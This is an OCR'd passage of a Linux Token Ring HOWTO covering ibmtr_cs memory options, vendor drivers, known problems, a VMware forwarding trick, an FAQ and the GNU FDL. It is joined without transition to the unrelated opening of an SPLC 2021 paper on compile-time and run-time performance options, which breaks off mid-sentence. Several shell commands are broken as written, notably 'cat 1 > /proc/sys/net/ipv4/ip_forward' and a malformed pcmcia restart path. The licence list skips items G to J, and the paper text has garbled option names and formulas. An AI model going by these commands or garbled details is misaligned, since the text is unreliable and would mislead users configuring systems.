Config.opts mangling (or how to send yourself insane) This is the hardest part to getting the pcmaiia adapters working with the drivers that need the `ibmtr_cs` line in `/etc/pcmaiia/config.opts`. No set of values is guaranteed to work the same on a different machine. It really is a case of trial and error but forewarned and forearmed with a little bit of knowledge can make the process a whole lot easier. "Hey, I don't care, just give me something that works" OK, try this, it works in most situations, if it doesn't you have to read the rest of the section anyway. Just insert the following line in `/etc/pcmaiia/config.opts` ```bash modules "ibmtr_cs" opts "mmiobase=0xd2000 srambase=0xd4000" ``` restart pcmaiia and insert the adapter. "OK, that didn't work, bring on the pain" The pcmcia driver need to allocate two areas of memory to operate properly. All areas of memory allocated must be aligned on the same boundary as the size of the area being aligned, i.e. a block 8K in size must be on an 8K boundary (0xc8000, 0xca000, 0xcc000, 0xce000, 0xd0000, 0xd2000) and for a 16K block must be on a 16K boundary (0xc8000, 0xcc000, 0xd0000, 0xd4000). All memory areas must be allocated within the ISA address space, 0xC0000−0xDFFFF. Theoretically you should be able to use anywhere within this area, although experience has shown that most machines hide stuff in the 0xc0000−0xc9fff area. Some machines have even been known to use the 0xd0000−0xd1fff area without telling anybody (some thinkpads !!). So you really want to stick with memory allocations in the 0xcc000 − 0xdffff range. Of course, the two memory areas cannot overlap either ;) The first area of memory is an 8K area for the memory mapped input/output (MMIO) and must be placed on an 8K boundary. This area of memory is not usually the cause of any problems and can be placed pretty much anywhere, recommended values are: 0xcc000, 0xd0000,0xd2000,0xd4000. The second area of memory can be sized to fit your desires, this is the area of memory where the incoming and outgoing packets are stored and received. The driver defaults to a 16K memory size and must be placed on a 16K boundary. Good areas are: 0xd0000,0xd4000,0xd8000. Once you've decided which areas of memory you are goin to try, you need to add the correct line to the /etc/pcmcia/config.opts file. Configuration lines in this file take the format of: ``` module "module_name" opts "option1=opt1_value option2=opt2_value ..." ``` In our case module_name is ibmtr_cs. There are three options that be set with the ibmtr_cs driver, mmiobase, srambase and sramsize. If they are not set they will revert to the defaults in the driver, which in 9 cases out of 10 won't work for you. sramsize rarely has to be set unless you are looking for that last little bit of performance from your adapter. So, having decided upon your values, let's say 0xd2000 for the MMIO and 0xd4000 for the shared memory you would build a config.opts line like this: ``` module "ibmtr_cs" opts "mmiobase=0xd2000 srambase=0xd4000" ``` The pcmcia_cs package must be restarted for these new options to take effect, usually with: ``` /etc/init.d/pcmcia restart or /etc/rc.d/init.d/pcmcia/restart ``` depending upon which run level organization your distribution adheres to. Then just plug it in and see if it works. If not you'll just have to go back and change the values for mmiobase and srambase until you find a combination that works. Or, you can upgrade to a kernel/pcmcia_cs version that support high memory allocation, where all this config.opts nonsense is not required and you can just happily plug your adapter in and watch it run. ### 3.1.8. Madge Supplied Drivers Madge released 2.31 of their driver in 1999 and 2.41 in late 2001. Both drivers can be downloaded from the [Madge](http://www.madgemkr.com) web site and the 2.41 driver is also available from the [Linux Token Ring Project](http://www.linux-tokenring.org) web site. Once the drivers have been downloaded, see the README file that comes with the drivers for instruction on how to built and install the drivers. The only other issue some people find with the drivers is a failure to build the tool chain due to an incorrect version of the newt libraries. If you get a compiler error relating to newt.h change the madge–source/include/mtok/config.h file so that the #define NEWNEWT line reads: ``` #define NEWNEWT 1 ``` This will ensure the tools use the correct newt libraries during the build process. A patch is available from the Linux Token Ring Project web site for the 2.31 drivers to enable them to work with the 2.4.x kernels. --- ### 3.1.9. Olicom Drivers Back when Olicom were still in business they did produce a Linux driver that does actually work. Trying to find the driver these days is a bit tough. If the ftp.olicom.com site is still up and running, the driver can be found there. The driver is a combination of GPL source code and proprietary binary low level code. The driver only works with the 2.0.36 and 2.2.x kernels. It should be possible to port this driver to the 2.4.x kernels... 4. Known problems See www.linuxtr.net for the latest greatest set of bugs. Generally speaking the biggest problem that I've seen (with ibmtr) is that if you pull your connection from the wall the 2.0.x series of kernels would generally not recover. This has been fixed in the latest version of ibmtr and the driver should now recognize when the link cable has been detached. There are some laptops that don't want to work with the Olympic Cardbus adapter, for some reason the driver never sees the open interrupt from the card. I don't think this is a problem with the driver, but with the Cardbus subsystem, for some people this problem has simply gone away with a newer kernel and I personally have never seen it on the laptops I've used in the development of the driver (Sony Vaio Z505 and Dell Latitude CPx500). 5. VMWare and Token Ring Thanks to Scott Russell scottrus@raleigh.ibm.com for this little "trick" One of the bummers about VMWare is if you are on a Token–Ring adapter, your VMWare system can't have a real TCP/IP address. Turns out this isn't the case. Here's how to do it. - In the info below we'll call your linux box 'linux.mycompany.biz.com' - Register another ip address, I'll call it 'vmware.mycompany.biz.com' - Make sure FORWARD_IPV4=true in your /etc/sysconfig/network file. If you have to change it you can dynamically turn on the feature as root ``` cat 1 > /proc/sys/net/ipv4/ip_forward ``` - Alias the second ip to the TR adapter. You end up with something like this from /sbin/ifconfig: ``` tr0 linux.mycompany.biz.com tr0:0 vmware.mycompany.biz.com vmnet1 192.168.0.1 ``` - Make sure you can ping both ip addresses from another box. If you cannot then this next step will not work. - Use ipchains/iptables to redirect incoming traffic for the tr0:0 interface to your vmnet1 interface. (When I did this I only redirected specific ports from tr0:0 to vmnet1.) Now any outside system your 'NT' box appears to be on the TR. In bound traffic can find it as well as out. 6. Commonly asked Questions Here are a collection of commonly asked questions that arise from time to time on the linux-tr mailing list. If your question isn't answered here or elsewhere in this document, feel free to ask away on the mailing list. Q: **DHCP doesn't work with my Token Ring adapter.** A: Certain dhcp servers and clients do not work properly with token ring drivers. This is especially true with the 2.4 kernels. During the development of the 2.3.x series of kernels the internal type for token ring was changed to accommodate multicast support over token ring. The solution is to upgrade your dhcp client/server to a version that supports token ring and/or the latest kernel versions. Q: **I can't set the LAA on my adapter with ifconfig tr0 hw tr 4000DEADBEEF.** A: Firstly, double check that your adapter/driver support setting the LAA, and that you've supplied a valid LAA. Also, most drivers will only allow this to be set before the adapter is opened onto the ring. Again, this is related to the change in the internal type for token ring in the 2.4 kernels. A patch is available from the [web site](#) for nettools that fixes this and allows the LAA to be set. Q: **My Linux machine is on a bridged network and I'm having connectivity issues with machine beyond the bridge.** A: The token ring source routing code in the kernel uses the spanning tree algorithm. Contact your network administrator to enable this protocol on the bridges. Q: **Can I use a Linux machine to bridge between token ring and ethernet?** A: The simply answer is no. Briding network topologies in software is incredibly complicated and while it is possibly, nobody has written the code to do it. If you must bridge there are several manufacturers that produce hardware bridges (most notably Cisco). Q: **OK, if I can't bridge, how do I connect my Token Ring and ethernet networks?** A: A cheap linux box with a token ring and ethernet adapter makes an excellent router. There is no difference between setting up a token ring/ethernet router and an ethernet/ethernet router. You can do masquerading (NAT) and filtering on the router as per usual. For more details see the Netfilter howto. A. GNU Free Documentation License A.1. 0. PREAMBLE The purpose of this License is to make a manual, textbook, or other written document "free" in the sense of freedom: to assure everyone the effective freedom to copy and redistribute it, with or without modifying it, either commercially or noncommercially. Secondarily, this License preserves for the author and publisher a way to get credit for their work, while not being considered responsible for modifications made by others. This License is a kind of "copyleft", which means that derivative works of the document must themselves be free in the same sense. It complements the GNU General Public License, which is a copyleft license designed for free software. We have designed this License in order to use it for manuals for free software, because free software needs free documentation: a free program should come with manuals providing the same freedoms that the software does. But this License is not limited to software manuals; it can be used for any textual work, regardless of subject matter or whether it is published as a printed book. We recommend this License principally for works whose purpose is instruction or reference. A.2. 1. APPLICABILITY AND DEFINITIONS This License applies to any manual or other work that contains a notice placed by the copyright holder saying it can be distributed under the terms of this License. The "Document", below, refers to any such manual or work. Any member of the public is a licensee, and is addressed as "you". A "Modified Version" of the Document means any work containing the Document or a portion of it, either copied verbatim, or with modifications and/or translated into another language. A "Secondary Section" is a named appendix or a front–matter section of the Document that deals exclusively with the relationship of the publishers or authors of the Document to the Document's overall subject (or to related matters) and contains nothing that could fall directly within that overall subject. (For example, if the Document is in part a textbook of mathematics, a Secondary Section may not explain any mathematics.) The relationship could be a matter of historical connection with the subject or with related matters, or of legal, commercial, philosophical, ethical or political position regarding them. The "Invariant Sections" are certain Secondary Sections whose titles are designated, as being those of Invariant Sections, in the notice that says that the Document is released under this License. The "Cover Texts" are certain short passages of text that are listed, as Front−Cover Texts or Back−Cover Texts, in the notice that says that the Document is released under this License. A "Transparent" copy of the Document means a machine–readable copy, represented in a format whose specification is available to the general public, whose contents can be viewed and edited directly and straightforwardly with generic text editors or (for images composed of pixels) generic paint programs or (for drawings) some widely available drawing editor, and that is suitable for input to text formatters or for automatic translation to a variety of formats suitable for input to text formatters. A copy made in an otherwise Transparent file format whose markup has been designed to thwart or discourage subsequent modification by readers is not Transparent. A copy that is not "Transparent" is called "Opaque". Examples of suitable formats for Transparent copies include plain ASCII without markup, Texinfo input format, LaTeX input format, SGML or XML using a publicly available DTD, and standard−conforming simple HTML designed for human modification. Opaque formats include PostScript, PDF, proprietary formats that can be read and edited only by proprietary word processors, SGML or XML for which the DTD and/or processing tools are not generally available, and the machine−generated HTML produced by some word processors for output purposes only. The "Title Page" means, for a printed book, the title page itself, plus such following pages as are needed to hold, legibly, the material this License requires to appear in the title page. For works in formats which do not have any title page as such, "Title Page" means the text near the most prominent appearance of the work's title, preceding the beginning of the body of the text. A.3. 2. VERBATIM COPYING You may copy and distribute the Document in any medium, either commercially or noncommercially, provided that this License, the copyright notices, and the license notice saying this License applies to the Document are reproduced in all copies, and that you add no other conditions whatsoever to those of this License. You may not use technical measures to obstruct or control the reading or further copying of the copies you make or distribute. However, you may accept compensation in exchange for copies. If you distribute a large enough number of copies you must also follow the conditions in section 3. You may also lend copies, under the same conditions stated above, and you may publicly display copies. A.4. 3. COPYING IN QUANTITY If you publish printed copies of the Document numbering more than 100, and the Document's license notice requires Cover Texts, you must enclose the copies in covers that carry, clearly and legibly, all these Cover Texts: Front–Cover Texts on the front cover, and Back–Cover Texts on the back cover. Both covers must also clearly and legibly identify you as the publisher of these copies. The front cover must present the full title with all words of the title equally prominent and visible. You may add other material on the covers in addition. Copying with changes limited to the covers, as long as they preserve the title of the Document and satisfy these conditions, can be treated as verbatim copying in other respects. If the required texts for either cover are too voluminous to fit legibly, you should put the first ones listed (as many as fit reasonably) on the actual cover, and continue the rest onto adjacent pages. If you publish or distribute Opaque copies of the Document numbering more than 100, you must either include a machine-readable Transparent copy along with each Opaque copy, or state in or with each Opaque copy a publicly-accessible computer-network location containing a complete Transparent copy of the Document, free of added material, which the general network–using public has access to download anonymously at no charge using public–standard network protocols. If you use the latter option, you must take reasonably prudent steps, when you begin distribution of Opaque copies in quantity, to ensure that this Transparent copy will remain thus accessible at the stated location until at least one year after the last time you distribute an Opaque copy (directly or through your agents or retailers) of that edition to the public. It is requested, but not required, that you contact the authors of the Document well before redistributing any large number of copies, to give them a chance to provide you with an updated version of the Document. A.5. 4. MODIFICATIONS You may copy and distribute a Modified Version of the Document under the conditions of sections 2 and 3 above, provided that you release the Modified Version under precisely this License, with the Modified Version filling the role of the Document, thus licensing distribution and modification of the Modified Version to whoever possesses a copy of it. In addition, you must do these things in the Modified Version: - **A.** Use in the Title Page (and on the covers, if any) a title distinct from that of the Document, and from those of previous versions (which should, if there were any, be listed in the History section of the Document). You may use the same title as a previous version if the original publisher of that version gives permission. - **B.** List on the Title Page, as authors, one or more persons or entities responsible for authorship of the modifications in the Modified Version, together with at least five of the principal authors of the Document (all of its principal authors, if it has less than five). - **C.** State on the Title Page the name of the publisher of the Modified Version, as the publisher. - **D.** Preserve all the copyright notices of the Document. - **E.** Add an appropriate copyright notice for your modifications adjacent to the other copyright notices. - **F.** Include, immediately after the copyright notices, a license notice giving the public permission to use the Modified Version under the terms of this License, in the form shown in the Addendum below. the original publisher of the version it refers to gives permission. • K. In any section entitled "Acknowledgements" or "Dedications", preserve the section's title, and preserve in the section all the substance and tone of each of the contributor acknowledgements and/or dedications given therein. • L. Preserve all the Invariant Sections of the Document, unaltered in their text and in their titles. Section numbers or the equivalent are not considered part of the section titles. • M. Delete any section entitled "Endorsements". Such a section may not be included in the Modified Version. • N. Do not retitle any existing section as "Endorsements" or to conflict in title with any Invariant Section. If the Modified Version includes new front−matter sections or appendices that qualify as Secondary Sections and contain no material copied from the Document, you may at your option designate some or all of these sections as invariant. To do this, add their titles to the list of Invariant Sections in the Modified Version's license notice. These titles must be distinct from any other section titles. You may add a section entitled "Endorsements", provided it contains nothing but endorsements of your Modified Version by various parties—for example, statements of peer review or that the text has been approved by an organization as the authoritative definition of a standard. You may add a passage of up to five words as a Front−Cover Text, and a passage of up to 25 words as a Back−Cover Text, to the end of the list of Cover Texts in the Modified Version. Only one passage of Front−Cover Text and one of Back−Cover Text may be added by (or through arrangements made by) any one entity. If the Document already includes a cover text for the same cover, previously added by you or by arrangement made by the same entity you are acting on behalf of, you may not add another; but you may replace the old one, on explicit permission from the previous publisher that added the old one. The author(s) and publisher(s) of the Document do not by this License give permission to use their names for publicity for or to assert or imply endorsement of any Modified Version. A.6. 5. COMBINING DOCUMENTS You may combine the Document with other documents released under this License, under the terms defined in section 4 above for modified versions, provided that you include in the combination all of the Invariant Sections of all of the original documents, unmodified, and list them all as Invariant Sections of your combined work in its license notice. The combined work need only contain one copy of this License, and multiple identical Invariant Sections may be replaced with a single copy. If there are multiple Invariant Sections with the same name but different contents, make the title of each such section unique by adding at the end of it, in parentheses, the name of the original author or publisher of that section if known, or else a unique number. Make the same adjustment to the section titles in the list of Invariant Sections in the license notice of the combined work. In the combination, you must combine any sections entitled "History" in the various original documents, forming one section entitled "History"; likewise combine any sections entitled "Acknowledgements", and any sections entitled "Dedications". You must delete all sections entitled "Endorsements." A.7. 6. COLLECTIONS OF DOCUMENTS You may make a collection consisting of the Document and other documents released under this License, and replace the individual copies of this License in the various documents with a single copy that is included in the collection, provided that you follow the rules of this License for verbatim copying of each of the documents in all other respects. You may extract a single document from such a collection, and distribute it individually under this License, provided you insert a copy of this License into the extracted document, and follow this License in all other respects regarding verbatim copying of that document. A.8. 7. AGGREGATION WITH INDEPENDENT WORKS A compilation of the Document or its derivatives with other separate and independent documents or works, in or on a volume of a storage or distribution medium, does not as a whole count as a Modified Version of the Document, provided no compilation copyright is claimed for the compilation. Such a compilation is called an "aggregate", and this License does not apply to the other self-contained works thus compiled with the Document, on account of their being thus compiled, if they are not themselves derivative works of the Document. If the Cover Text requirement of section 3 is applicable to these copies of the Document, then if the Document is less than one quarter of the entire aggregate, the Document's Cover Texts may be placed on covers that surround only the Document within the aggregate. Otherwise they must appear on covers around the whole aggregate. A.9. 8. TRANSLATION Translation is considered a kind of modification, so you may distribute translations of the Document under the terms of section 4. Replacing Invariant Sections with translations requires special permission from their copyright holders, but you may include translations of some or all Invariant Sections in addition to the original versions of these Invariant Sections. You may include a translation of this License provided that you also include the original English version of this License. In case of a disagreement between the translation and the original English version of this License, the original English version will prevail. A.10. 9. TERMINATION You may not copy, modify, sublicense, or distribute the Document except as expressly provided for under this License. Any other attempt to copy, modify, sublicense or distribute the Document is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. A.11. 10. FUTURE REVISIONS OF THIS LICENSE The Free Software Foundation may publish new, revised versions of the GNU Free Documentation License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. See http://www.gnu.org/copyleft/. Each version of the License is given a distinguishing version number. If the Document specifies that a particular numbered version of this License "or any later version" applies to it, you have the option of following the terms and conditions either of that specified version or of any later version that has been published (not as a draft) by the Free Software Foundation. If the Document does not specify a version number of this License, you may choose any version ever published (not as a draft) by the Free Software Foundation.
{"Source-Url": "http://directory.umm.ac.id/Operating%20System%20Ebook/Linux-pdf-HOWTO/Token-Ring.pdf", "len_cl100k_base": 15153, "olmocr-version": "0.1.50", "pdf-total-pages": 38, "total-fallback-pages": 0, "total-input-tokens": 71623, "total-output-tokens": 17269, "length": "2e13", "weborganizer": {"__label__adult": 0.00033926963806152344, "__label__art_design": 0.0012121200561523438, "__label__crime_law": 0.00030422210693359375, "__label__education_jobs": 0.0010929107666015625, "__label__entertainment": 0.0001385211944580078, "__label__fashion_beauty": 0.0001251697540283203, "__label__finance_business": 0.0012121200561523438, "__label__food_dining": 0.0002799034118652344, "__label__games": 0.0011491775512695312, "__label__hardware": 0.01346588134765625, "__label__health": 0.00019860267639160156, "__label__history": 0.00032019615173339844, "__label__home_hobbies": 0.00030922889709472656, "__label__industrial": 0.000598907470703125, "__label__literature": 0.000308990478515625, "__label__politics": 0.0002213716506958008, "__label__religion": 0.0004057884216308594, "__label__science_tech": 0.041015625, "__label__social_life": 5.263090133666992e-05, "__label__software": 0.0831298828125, "__label__software_dev": 0.85302734375, "__label__sports_fitness": 0.0001819133758544922, "__label__transportation": 0.0007314682006835938, "__label__travel": 0.0002211332321166992}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 64642, 0.06365]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 64642, 0.0787]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 64642, 0.87051]], "google_gemma-3-12b-it_contains_pii": [[0, 555, false], [555, 5453, null], [5453, 5766, null], [5766, 7580, null], [7580, 9272, null], [9272, 9272, null], [9272, 10891, null], [10891, 11526, null], [11526, 13181, null], [13181, 14635, null], [14635, 16950, null], [16950, 19801, null], [19801, 23534, null], [23534, 26993, null], [26993, 30360, null], [30360, 32720, null], [32720, 33496, null], [33496, 35610, null], [35610, 37954, null], [37954, 40547, null], [40547, 43715, null], [43715, 44861, null], [44861, 45680, null], [45680, 46880, null], [46880, 49071, null], [49071, 49105, null], [49105, 50266, null], [50266, 53427, null], [53427, 54163, null], [54163, 56169, null], [56169, 57702, null], [57702, 59882, null], [59882, 61094, null], [61094, 61753, null], [61753, 62665, null], [62665, 63321, null], [63321, 63781, null], [63781, 64642, null]], "google_gemma-3-12b-it_is_public_document": [[0, 555, true], [555, 5453, null], [5453, 5766, null], [5766, 7580, null], [7580, 9272, null], [9272, 9272, null], [9272, 10891, null], [10891, 11526, null], [11526, 13181, null], [13181, 14635, null], [14635, 16950, null], [16950, 19801, null], [19801, 23534, null], [23534, 26993, null], [26993, 30360, null], [30360, 32720, null], [32720, 33496, null], [33496, 35610, null], [35610, 37954, null], [37954, 40547, null], [40547, 43715, null], [43715, 44861, null], [44861, 45680, null], [45680, 46880, null], [46880, 49071, null], [49071, 49105, null], [49105, 50266, null], [50266, 53427, null], [53427, 54163, null], [54163, 56169, null], [56169, 57702, null], [57702, 59882, null], [59882, 61094, null], [61094, 61753, null], [61753, 62665, null], [62665, 63321, null], [63321, 63781, null], [63781, 64642, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 64642, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 64642, null]], "pdf_page_numbers": [[0, 555, 1], [555, 5453, 2], [5453, 5766, 3], [5766, 7580, 4], [7580, 9272, 5], [9272, 9272, 6], [9272, 10891, 7], [10891, 11526, 8], [11526, 13181, 9], [13181, 14635, 10], [14635, 16950, 11], [16950, 19801, 12], [19801, 23534, 13], [23534, 26993, 14], [26993, 30360, 15], [30360, 32720, 16], [32720, 33496, 17], [33496, 35610, 18], [35610, 37954, 19], [37954, 40547, 20], [40547, 43715, 21], [43715, 44861, 22], [44861, 45680, 23], [45680, 46880, 24], [46880, 49071, 25], [49071, 49105, 26], [49105, 50266, 27], [50266, 53427, 28], [53427, 54163, 29], [54163, 56169, 30], [56169, 57702, 31], [57702, 59882, 32], [59882, 61094, 33], [61094, 61753, 34], [61753, 62665, 35], [62665, 63321, 36], [63321, 63781, 37], [63781, 64642, 38]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 64642, 0.03448]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
bda8c3d92ee9250c7a302c2f753bf7a461e19a95
The Interplay of Compile-time and Run-time Options for Performance Prediction Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel To cite this version: Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel. The Interplay of Compile-time and Run-time Options for Performance Prediction. SPLC 2021 - 25th ACM International Systems and Software Product Line Conference - Volume A, Sep 2021, Leicester, United Kingdom. pp.1-12, 10.1145/3461001.3471149. hal-03286127 HAL Id: hal-03286127 https://hal.archives-ouvertes.fr/hal-03286127 Submitted on 15 Jul 2021 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. The Interplay of Compile-time and Run-time Options for Performance Prediction Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel Univ Rennes, INSA Rennes, CNRS, Inria, IRISA Rennes, France firstname.last@irisa.fr ABSTRACT Many software projects are configurable through compile-time options (e.g., using \texttt{/configure}) and also through run-time options (e.g., command-line parameters, fed to the software at execution time). Several works have shown how to predict the effect of run-time options on performance. However it is yet to be studied how these prediction models behave when the software is built with different compile-time options. For instance, is the best run-time configuration always the best \textit{w.r.t.} the chosen compilation options? In this paper, we investigate the effect of compile-time options on the performance distributions of 4 software systems. There are cases where the compiler layer effect is linear which is an opportunity to generalize performance models or to tune and measure runtime performance at lower cost. We also prove there can exist an interplay by exhibiting a case where compile-time options significantly alter the performance distributions of a configurable system. CSCS CONCEPTS • Software and its engineering → Software product lines; Software performance; • Computing methodologies → Machine learning. 1 INTRODUCTION An ideal software system is expected to deliver the right functionality on time, using as few resources as possible, in every possible circumstances whatever the hardware, the operating system, the compiler, or the data fed as input. For fitting such a diversity of needs, it is increasingly common that software comes in many variants and is highly configurable through configuration options. Numerous works have studied the effects of configuration options on performance. The outcome is a performance model that can be used to predict the performance of any configuration, to find an optimal configuration, or to identify, debug, and reason about influential options of a system [19, 23, 28, 29, 38–40, 44, 49, 53, 56, 63]. There are however numerous mechanisms to implement and deliver options: configuration files, command-line parameters, feature toggles or flags, plugins, etc. A useful distinction to make is between compile-time and run-time options. On the one hand, compile-time options can be used to build a custom system that can then be executed for a variety of usages. The widely used `\texttt{/configure} &\& make` is a prominent example for configuring a software project at compile-time. On the other hand, run-time options are used to parameterize the behavior of the system at load-time or during the execution. For instance, users can set some values to command-line arguments for choosing a specific algorithm or tuning the execution time based on the particularities of a given input to process. Both compile-time and run-time options can be configured to reach specific functional and performance goals. Existing studies consider either compile-time or run-time options, but not both and the possible interplay between them. For instance, all run-time configurations are measured using a unique executable of the system, typically compiled with the default compile-time configuration (i.e., using \texttt{/configure} without overriding compile-time options’ values). Owing to the cost of measuring configurations, this is perfectly understandable but it is also a threat to validity. In particular, we can question the generality of these models if we change the compile-time options when building the software system: Do compile-time options change the performance distribution of run-time configurations? If yes, to what extent? Is the best run-time configuration always the best? Are the most influential run-time options always the same whatever the compile-time options used? Can we reuse a prediction model whatever the build has been? In short: (RQ1) Do compile-time options change the performance distributions of configurable systems? In this paper we investigate the effect of compile-time options together with runtime options on the performance distributions of 4 software systems. For each of these systems, we measure a relevant performance metric for a combination of \(nb_c\) compile time options and \(nb_r\) run-time options (yielding \(\binom{nb_c}{\text{pos}}\) possible configurations) over a number of different inputs. We show that the compile-time options can alter the run-time performance distributions of software systems, and that it is worth tuning the compile-time options to improve their performances. We thus address a second research question: (RQ2) How to tune software performances at the compile-time level? Our contributions are as follows: • We construct a protocol and carry out an empirical study investigating the effects of compile-time options on run-time performances, for 4 software systems, various workloads, and non-functional properties; • We provide a Docker image, a dataset of measurements, as well as analysis scripts\(^1\); • We exhibit a case (namely nodeJS and its operation rate) for which the compile-time options interact with the run-time options. We also present and implement a simple case of cross-layer tuning, providing a set of configuration options (run-time & compile-time) improving the operation rate of the default configuration of nodeJS. Remainder. Section 2 discusses the motivation of this paper; Section 3 presents the experimental protocol; Section 4 evaluates and analyses the results \textit{w.r.t.} this protocol; Section 5 discusses \(^1\)Companion repository; Zenodo data: https://zenodo.org/record/4706963; Docker: https://hub.docker.com/r/anonymice2021/splc21 the results, their limitations and future work; Section 6 describes research works related to the topic of this paper; Section 7 details the threats to validity; Section 8 concludes our paper. 2 BACKGROUND AND MOTIVATION 2.1 Compile-time and run-time options Many software systems are highly-configurable both at compile time and at run time. For instance, the './configure & make' is widely used to build a custom system i.e., an executable binary. Considering the x264 video encoder (see Figure 1), the compile-time option ‘–disable-asm’ can be used to disable "platform-specific assembly optimizations”. There are compile-time options to activate the needed functionality (e.g., ‘–disable-avs’), to fit requirements related to the hardware or operating system, etc. Some of these options have a suggested impact on performance. For the same subject system x264, it is also possible to use run-time options such as ‘– tree’ and ‘–cabinet’ with possible effects on the size and encoding time. Run-time options are used to parameterize the behavior of the system at load time or during the execution. ![Figure 1: Cross-layer variability of x264](image) This paper investigates how compile-time options can affect software performances and how compile-time options interact with run-time options. Figure 1: Cross-layer variability of x264 Both compile-time and run-time options can be configured to reach specific functional and performance goals. Beyond x264, many projects propose these two kinds of options. A configuration option, being compile-time or run-time, can take different possible values. Boolean options have two possible values: ‘– activate’ or ‘– deactivate’ are typical examples of Boolean compile-time options. There are also numerical options with a range of integer or float values. Options with string values also exist and the set of possible values is usually predefined. From a terminology point of view, we consider that a compile-time (resp. run-time) configuration is an assignment of values to compile-time options (resp. run-time options). It is possible to use ‘./configure’ without setting explicit values. In this case, default values are assigned and form a default configuration. Similarly, when x264 is called, default run-time options’ values are internally used and constitute a default run-time configuration. 2.2 Performance prediction Performance model. Given a software system with a set of run-time configurations, a performance model maps each run-time configuration to the performance of the system. A performance model has many applications and use-cases [4, 19, 22–24, 28, 29, 38–40, 44, 49, 53, 56, 60, 63, 65]: optimization (tuning) and finding of the best configuration, specialization of the configuration space, understanding and debugging of the effects of configuration options, verification (e.g., non-regression testing), etc. The performance of a system, such as execution time, is usually measured using the same compiled executable (binary). In our case, we consider that the way the software is compiled is subject to variability; there are two configuration spaces. Formally, given a software system with a compile-time configuration space $C$ and a run-time configuration space $R$, a performance model is a black-box function $f: C \times R \rightarrow \mathbb{R}$ that maps each run-time configuration $r \in R$ to the performance of the system compiled with a compile-time configuration $c \in C$. The construction of a performance model consists in running the system in a fixed compile-time setting $c \in C$ on various configurations $r \in R$, and record the resulting performance values $p = f(c, r)$. Learning performance models. Measuring all configurations of a configurable system is the most obvious path to, for example, find a well-suited configuration. It is however too costly or infeasible in practice. Machine-learning techniques address this issue by measuring only a subset of configurations (known as sample) and then using these configurations’ measurements to build a performance model capable of predicting the performance of other configurations (i.e., configurations not measured before). Research work thus follow a "sampling, measuring, learning" process [19, 22–24, 28, 29, 38–40, 44, 49, 53, 56, 60, 63, 65]. The training data for learning a performance model of a system compiled with a configuration $c \in C$ is then $D_c = \{(R^i, P^i) | i \in [1 \ldots n]\}$ where $n$ is the number of measurements. Statistical learning techniques, such as linear regression [51], decision trees [48], or random forests [42], use this training set to build prediction models. Generalization and transfer. Performance prediction models pursue the goal of generalizing beyond the training distribution. A first degree of generalization is that the prediction model is accurate for unmeasured and unobserved run-time configurations – it is the focus of most of previous works. However, it is not sufficient since the performance model may not generalize to the compile-time configuration space. Considering Figure 1, one can question the generalization of a performance prediction model learned with a default compile-time configuration: will this model transfer well when the software is compiled differently? 2.3 Research questions The use of different compile-time configurations may change the raw and absolute performance values, but it can also change the overall distribution of configuration measurements. Given the vast variety of possible compile-time configurations that may be considered and actually used in practice, the generalization of run-time performance should be carefully studied. We aim to address two main research questions, each coming with their hypothesis. (RQ1) Do compile-time options change the performance distributions of configurable systems? An hypothesis is that two performance models $f_1$ and $f_2$ over two compile-time configurations $c_1 \in C$ (resp. $c_2$) are somehow related and close. In its simplest form, there is a linear mapping: $f_1 = \beta f_2 + \alpha$. In this case, the performance of the whole run-time configurations increases or decreases; we aim to quantify this gain or lose. More complex mappings can exist since the underlying performance distributions differ. Such differences can impact the ranking of configurations and the statistical influence of options on performance. Owing to the cost of compiling and measuring configurations, we aim to characterize what configuration knowledge generalizes and whether the transfer of performance models is immediate or requires further investment. A follow up research question is: (RQ2) How to tune software performances at the compile-time level? There are certainly compile-time options with negative or positive impacts on performance (e.g., debugging options). Hence an idea is to tune the right compile-time options to eventually select optimal run-time configurations. An hypothesis is that compile-time options interact with run-time options, which can further challenges the tuning. Depending on the relationship between performance distributions (RQ1), the tuning strategy of compile-time options may differ. 3 EXPERIMENTAL PROTOCOL To answer these research questions, we built the following experimental protocol. All the materials are freely available in the companion repository. 3.1 Selecting the subject systems The objects of this experiment are a set of software systems that conduct a large panel of benchmarks on open-source software systems; our own knowledge in popular papers on software variability. The selected software systems must cover various application domains to make our conclusions generalizable. As a baseline for searching for software systems, we used: 1/ research papers on performance and/or variability; 2/ the website openbenchmarking\(^2\) that conducts a large panel of benchmarks on open-source software systems; 3/ our own knowledge in popular open-source projects. We selected 4 open-source 